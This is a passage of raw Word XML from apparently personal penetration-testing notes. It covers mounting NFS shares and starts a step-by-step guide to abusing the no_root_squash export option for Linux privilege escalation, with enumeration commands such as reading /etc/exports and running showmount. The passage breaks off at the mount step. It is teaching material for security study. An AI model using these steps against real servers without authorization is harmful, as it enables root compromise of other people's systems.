          <w:numId w:val="90"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if we want </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html (as shown in screenshot):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo mount -t nfs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/var/www/html </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If /mnt/1 doesn't exist, use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo mkdir -p /mnt/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ensures that any parent directories (like /mnt) exist. This is helpful if you're not sure whether /mnt exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount: The Linux command to attach (mount) a file system to the local file system hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t nfs: Specifies the type of file system to mount, in this case, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS (Network File System)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace /var/www/html with the the directory on the NFS server that is being exported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to mount NFS is as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount -o rw,vers=2 &lt;target&gt;:&lt;share&gt; &lt;local_directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius Linux NFS Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F40">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in the NFS Priv Esc example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This would connect using NFSv2 in read/write mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The other one would try NFSv4 or v3 in default mode, which might fail if the server only supports v2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /mnt/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Read the filenames and permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -ld /mnt/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d: The directory option tells ls to show information about the directory itself, not the files inside it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F48">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5600700" cy="1400175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="313" name="image300.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image300.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1043"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56007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2F49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="859"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see that the directory is owned by the UID 2017, and belongs to the group with the ID of www-data, or 33 . This means that on the target box, i.e the server hosting the share, the directory is owned by a user with that specific UID. We proceed to the second share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8iegqexyojqx" w:id="421"/>
      <w:bookmarkEnd w:id="421"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing no_root_squash configuration to priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Tib3rius NFS video from Linux Priv Esc Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F4F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Squashing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Squashing is how NFS prevents an obvious privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the remote user is (or claims to be) root (uid=0), NFS will instead “squash” the user and treat them as if they are the “nobody” user, in the “nogroup” group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While this behavior is default, it can be disabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F54">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no_root_squash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no_root_squash is an NFS configuration option which turns root squashing off.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When included in a writable share configuration, a remote user who identifies as “root” can create files on the NFS share as the local root user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check the contents of /etc/exports for shares with the no_root_squash option</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/exports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm that the NFS share is available for remote mounting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">showmount -e 192.168.1.25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exports list on 192.168.1.25:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a mount point on your local machine and mount the /tmp NFS share:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
